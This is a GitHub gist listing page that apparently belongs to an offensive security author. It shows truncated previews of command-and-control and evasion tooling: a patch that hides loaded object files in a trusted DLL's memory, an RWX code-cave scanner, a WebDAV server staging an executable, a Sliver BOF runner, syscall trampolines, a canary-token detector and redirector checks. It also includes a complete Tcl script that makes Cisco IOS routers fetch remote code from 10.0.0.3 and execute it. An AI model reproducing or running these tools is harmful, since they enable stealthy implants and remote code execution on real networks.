zimnyaa
/ caveman-bof.diff
Created
July 28, 2023 13:02
A patch for NiCOFF to load the BOF in a memory region of a trusted DLL.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| diff --git a/Main.nim b/Main.nim | |
| index ef19f4c..c133586 100644 | |
| --- a/Main.nim | |
| +++ b/Main.nim | |
| @@ -128,7 +128,7 @@ proc ApplyGeneralRelocations(patchAddress:uint64,sectionStartAddress:uint64,give | |
| echo "[!] No code for type: ",givenType | |
| var allocatedMemory:LPVOID = nil | |
| - | |
| +var caveLibH: HANDLE |
zimnyaa
/ rwxscan.nim
Last active
August 9, 2023 13:40
A simple dynamic RWX allocation scanner. Used to find system libraries that alloc RWX regions on load.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import winim | |
| import std/strutils, os | |
| proc lpwstrc(bytes: array[MAX_PATH, WCHAR]): string = | |
| result = newString(bytes.len) | |
| for i in bytes: | |
| result &= cast[char](i) | |
| result = strip(result, chars = {cast[char](0)}) | |
| var pages = newSeq[int](0) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from flask import Flask, Response | |
| import os, time | |
| from io import BytesIO | |
| from zipfile import ZipFile | |
| from urllib.request import urlopen | |
| from threading import Thread | |
| from random import randint | |
| exetemplate = """<?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/mempe.exe</D:href><D:propstat><D:prop><D:resourcetype></D:resourcetype><D:getcontentlength>{}</D:getcontentlength><D:getlastmodified>Wed, 07 Jun 2023 21:57:19 GMT</D:getlastmodified><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:displayname>mempe.exe</D:displayname><D:getcontenttype>application/x-msdownload</D:getcontenttype><D:getetag>"17667f43a6d9164c5000"</D:getetag></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>""" | |
| roottemplate = """<?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/</D:href><D:propstat><D:prop><D:resourcetype>< |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "fmt" | |
| "syscall" | |
| "golang.org/x/sys/windows" | |
| "C" | |
| "time" | |
| ) | |
| const ( |
zimnyaa
/ sliverbof.py
Created
April 28, 2023 16:15
Runs a BOF from a sliver-py client with https://github.com/moloch--/sliver-py/pull/39/commits
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys, asyncio | |
| import time | |
| import sliver | |
| from struct import pack, calcsize | |
| class BeaconPack: # thanks COFFLoader | |
| def __init__(self): | |
| self.buffer = b'' |
zimnyaa
/ cisco-beacon.tcl
Created
March 1, 2023 13:48
A simple way of making Cisco IOS beacon back to you.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # stage.tcl | |
| set id "cisco-R1" | |
| source "tmpsys:lib/tcl/http.tcl" | |
| ::http::config -useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36 OPR/48.0.2685.32" | |
| set httpToken [::http::geturl http://10.0.0.3/static/$id] | |
| if {[lindex [split [::http::code $httpToken] " "] 1] == "200"} { | |
| source [::http::data $httpToken] | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // add this to syscalls.h | |
| extern PVOID SWT_Trampoline; | |
| VOID SWT_ResolveTrampoline(); | |
| // add this to syscalls.c | |
| PVOID SWT_Trampoline; | |
| VOID SWT_ResolveTrampoline() | |
| { | |
| HMODULE ntdllModule = IsModulePresent(L"ntdll.dll"); |
zimnyaa
/ canary-check.py
Created
December 23, 2022 20:21
Scan .docx for canaries (not just footers :D). Based on https://github.com/n3tsurge/detect-canary/blob/main/detect-canary.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import re | |
| import sys | |
| import zipfile | |
| import glob | |
| import logging | |
| import argparse | |
| def get_files(base_path=".", pattern="*.docx"): | |
| ''' |
zimnyaa
/ sliver-redir.py
Last active
December 23, 2022 20:17
Check live beacon URIs, certificate expiry dates and redirectors with sliver-py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from rich.console import Console | |
| from rich.tree import Tree | |
| from rich.markdown import Markdown | |
| import os, asyncio | |
| import time | |
| from datetime import datetime | |
| import sliver, OpenSSL, ssl, urllib.parse | |
| from datetime import datetime | |
| console = Console() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from rich.console import Console | |
| from rich.text import Text | |
| from rich.table import Table, Column | |
| from rich.markdown import Markdown | |
| import os, asyncio | |
| import time | |
| from datetime import datetime | |
| import sliver | |
| console = Console() |
NewerOlder